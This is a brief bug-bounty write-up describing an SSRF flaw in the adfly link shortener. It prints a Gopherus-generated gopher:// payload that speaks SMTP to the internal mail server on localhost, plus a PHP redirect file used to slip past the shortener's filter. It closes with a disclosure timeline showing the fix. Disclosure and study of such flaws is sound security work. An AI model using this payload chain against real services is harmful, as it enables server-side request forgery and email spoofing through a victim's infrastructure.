Gain adfly SMTP access with SSRF via Gopher Protocol

Zerb0a
Zerb0a
Jun 27, 2019 · 2 min read
Image for post
Image for post
Adfly Logo

Hi guys, My name is Rafli pasya. Today i want to share my story about SSRF on adfly, this bug i found 4 days ago and already Fixed.

Two month ago i found IDOR on adfly, and 4 days ago i found SSRF on adfly, using this vulnerability i able to send an email using adfly SMTP. it’s absolutely Dangerous if another hacker using this to attack Adfly Client.

Exploitation

i prepared this tool :
1. Gopherus
2. Server to upload php file

First of all i tried to short a Gopher:// url but it’s blocked by server. so i make a php file contains Gopherus Payload and it’s actually work.

i opened a CMD and type :
gopherus.py —exploit fastcgi
this is used to exploit fastcgi and gain RCE, unfortunally because i unable to see response body (only able to see <title> tag) this exploit not work.

So i tried to use SMTP exploit :
gopherus.py — exploit smtp
From Mail : adf@ly
To Mail : [myemail@.x.y]
Subject: PoCSSRF
Text: [empty]

Payload :
gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.

Now i make a php file :

<?php
header(‘location: gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.’);
?>

and i upload it to my server.

then i visit adfly site and short myserver.com/poc.php

after 1–5 minutes i check my Inbox and see an email from adf@ly.adf.ly

Image for post
Image for post

i quickly Report this bug to their team. it’s fixed 1 day after i reported the bug.

Thx for Reading, soory for bad English btw.

Original WriteUp :
https://raflipasya19.blogspot.com/2019/06/adfly-ssrf-to-smtp-takeover.html

Timeline :

- Sunday 23 June 2019 23:35 GMT+7 = Bug Found & Reported

- Monday 24 June 2019 17:16 GMT+7 = Triaged

- Monday 24 June 2019 22:34 GMT+7 = Bug Fixed

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store